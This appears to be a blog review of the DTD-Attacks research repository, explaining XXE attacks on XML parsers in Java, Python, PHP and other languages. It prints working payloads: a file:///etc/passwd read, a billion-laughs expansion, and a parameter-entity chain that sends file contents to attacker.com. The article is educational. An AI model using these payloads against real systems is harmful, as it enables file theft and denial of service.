Inside DTD-Attacks: A Cross-Language Framework for Testing XML Parser Vulnerabilities

Hook

A simple XML file can steal your /etc/passwd, trigger SSRF attacks, or crash your server—and most developers have no idea their parser allows it by default.

Context

XML External Entity (XXE) attacks have plagued web applications since the early 2000s, yet they continue to appear in OWASP's Top 10 vulnerabilities. The core issue isn't that developers deliberately write insecure code—it's that most XML parsers ship with dangerous defaults enabled. When a parser encounters an XML document with a Document Type Definition (DTD), it follows instructions that can reference external resources, expand entities recursively, or access local files. Different programming languages handle these scenarios differently, creating a minefield of security gotchas.

The RUB-NDS/DTD-Attacks repository emerged from security research at Ruhr University Bochum's Network and Data Security group. Rather than publishing theoretical vulnerability descriptions, the researchers built a practical testing framework that demonstrates exactly how XXE attacks work across Java, Python, Ruby, PHP, .NET, and Perl. This cross-language approach reveals an uncomfortable truth: parsers that seem safe in one ecosystem might have catastrophic vulnerabilities in another. For security researchers, penetration testers, and developers auditing legacy XML code, this repository serves as both a reference implementation and a wake-up call.

Technical Insight

System architecture — auto-generated

The DTD-Attacks framework is structured around attack vectors rather than programming languages. At its core, the repository contains malicious XML payloads organized by exploitation technique: external entity file disclosure, parameter entity abuse, recursive entity expansion (the "billion laughs" attack), and SSRF through external DTD references. Each attack category includes variations tailored to expose weaknesses in specific parser implementations.

Consider the classic external entity file disclosure attack. A vulnerable parser processes this innocent-looking XML:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When the parser encounters &xxe;, it resolves the external entity by reading /etc/passwd and inserting its contents into the XML tree. The application then processes this data—perhaps echoing it back in an error message or writing it to logs—leaking sensitive files. The DTD-Attacks repository includes dozens of variations: UTF-16 encoded payloads to bypass filters, parameter entity chains to exfiltrate data when direct entity expansion is blocked, and protocol handler exploits testing file://, http://, ftp://, and even jar:// schemes.

The billion laughs attack demonstrates denial of service through recursive entity expansion:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>

This seemingly small document expands to gigabytes of data in memory, consuming all available resources. The repository tests how different parsers handle entity expansion limits—or fail to impose them at all.

What makes DTD-Attacks particularly valuable is its language-specific test harnesses. The Java tests examine DOM, SAX, and StAX parsers with different configurations. Python tests probe lxml, ElementTree, and the older minidom implementations. Each language directory contains both vulnerable example code and payloads crafted to exploit that language's parser quirks. For instance, Python's ElementTree ignores external entities by default (secure), but lxml resolves them unless explicitly disabled (vulnerable). PHP's libxml2 binding historically resolved entities by default, though recent versions changed this behavior.

The repository also explores parameter entity attacks, which bypass restrictions on general entities. When an application blocks <!ENTITY> declarations, attackers can use parameter entities (prefixed with %) that are processed during DTD parsing, before entity expansion policies apply:

<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<foo>&send;</foo>

The external evil.dtd file contains:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;

This two-stage attack reads the local file, embeds it in a URL parameter, and sends it to the attacker's server—all through DTD processing. The repository includes complete examples of these multi-stage attacks, demonstrating how attackers chain techniques when direct exploitation fails.

Gotcha

The DTD-Attacks repository is a research artifact, not production security tooling, and that distinction creates significant limitations. First, there's no automated test runner that systematically executes all payloads against all parsers and generates a vulnerability report. You'll need to manually set up each language's environment, run individual test files, and interpret results yourself. The repository assumes you understand XXE attack mechanics and can modify payloads for your specific context—it's not a point-and-click vulnerability scanner.

Second, the project reflects parser behavior from 2015-2016 era research. Many parsers have since updated their default configurations, especially after XXE attacks gained prominence in security advisories. Modern versions of Python's lxml, Java's DocumentBuilderFactory with security managers enabled, and .NET's XmlReader all have improved defaults. Using these payloads against current parser versions may produce false negatives, suggesting security where careful configuration is still required. The repository is best used as a learning tool and payload reference rather than a definitive test of current parser security. Additionally, the lack of detailed documentation means you'll spend time reading source code to understand test setup and expected outcomes—this is a researcher's notebook, not a polished security product.

Verdict

Use DTD-Attacks if you're conducting security research on XML parser implementations, need educational examples to understand XXE attack mechanics across multiple languages, performing penetration testing where you need to craft language-specific XXE payloads, or auditing legacy code that processes XML from untrusted sources. It excels as a reference collection of attack patterns and a comparative study of parser security postures. Skip it if you need an automated security scanner for CI/CD pipelines (consider OWASP Dependency-Check with XXE rules instead), want up-to-date testing against 2024 parser versions (results will be unreliable), require production-ready mitigation code rather than exploitation examples, or lack the security expertise to interpret and adapt raw payloads. This is a specialist's toolkit for understanding XML attack surfaces, not a turnkey security solution.

Inside DTD-Attacks: A Cross-Language Framework for Testing XML Parser Vulnerabilities

Inside DTD-Attacks: A Cross-Language Framework for Testing XML Parser Vulnerabilities

Hook

Context

Technical Insight

Gotcha

Verdict

// KNOWLEDGE GRAPH

// CODEBASE INTELLIGENCE

Best for

Skip when

Inside DTD-Attacks: A Cross-Language Framework for Testing XML Parser Vulnerabilities

Hook

Context

Technical Insight

Gotcha

Verdict

// KNOWLEDGE GRAPH

// RELATED

Pi: A Coding Agent Toolkit That Treats Your Sessions as Training Data

Open Notebook: Building a Self-Hosted NotebookLM Clone with Multi-Provider AI

Open Interpreter: Running GPT-4 with Root Access to Your Machine

The Indie Hacker's AI Arbitrage Kit: Inside 50+ Generative SaaS Templates That Treat Code as Commodity

Pi: A Coding Agent Toolkit That Treats Your Sessions as Training Data

Open Notebook: Building a Self-Hosted NotebookLM Clone with Multi-Provider AI

Open Interpreter: Running GPT-4 with Root Access to Your Machine

// CODEBASE INTELLIGENCE

Best for

Skip when